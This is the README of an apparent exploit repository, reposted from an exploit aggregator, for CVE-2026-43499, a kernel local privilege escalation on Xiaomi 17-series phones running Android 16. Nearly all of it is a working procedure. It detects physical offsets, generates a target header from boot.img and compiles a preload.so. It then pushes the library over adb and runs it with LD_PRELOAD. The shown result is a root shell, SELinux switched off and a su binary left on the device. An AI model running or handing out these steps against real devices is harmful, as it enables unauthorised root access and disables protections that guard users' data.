## https://sploitus.com/exploit?id=C07E932E-4710-512B-9A92-F81FB7C4D342
# CVE-2026-43499 for `popsicle`
This repository contains the CVE-2026-43499 vulnerability on Xiaomi 17 Pro Max (`popsicle`) with Android 16 local privilege escalation. The kernel has been verified as follows:
```text
6.12.23-android16-5-g75e9b1c7ae7c-abogki463945075-4k
```
All Xiaomi 17, Pro, and Ultra series devices using this kernel are confirmed to be vulnerable. ## Profile
The profile contains only two physical addresses that need to be confirmed on the same firmware-Rooted device:
```json
{
"p0_phys_offset": "0x80000000",
"p0_kernel_phys_load": "0xc7800000"
}
```
It can be detected directly after connecting a rooted device:
```sh
python3 detect_offset.py
```
## Generate the target
Requires Python 3 and `llvm-objdump`:
```sh
python3 generate_target.py \
--boot boot.img \
--profile profile_model.json \
-o source/src/target.h
```
## Compile
```sh
make -C source clean preload
```
If NDK cannot be automatically detected:
```sh
NDK_ROOT=/path/to/android-ndk make -C source clean preload
```
Final output:
```text
source/build/bin/preload.so
```
## Run
```sh
adb push source/build/bin/preload.so /data/local/tmp/preload.so
adb shell 'chmod 0644 /data/local/tmp/preload.so'
adb shell 'LD_PRELOAD=/data/local/tmp/preload.so /system/bin/true'
adb shell '/data/local/tmp/su -c id'
```
Upon success, the following output will be visible:
```text
uid=0(root) gid=0(root) groups=0(root) context=u:r:kernel:s0
direct-root-summary root=1 id=1 su=1/... selinux=1->0 uid=0 euid=0 gid=0 egid=0
```
After exploiting this vulnerability, it is possible to unlock and enter the desktop. However, the newly started Android app fails to initialize properly, resulting in a crash. After restarting the app, it runs normally again.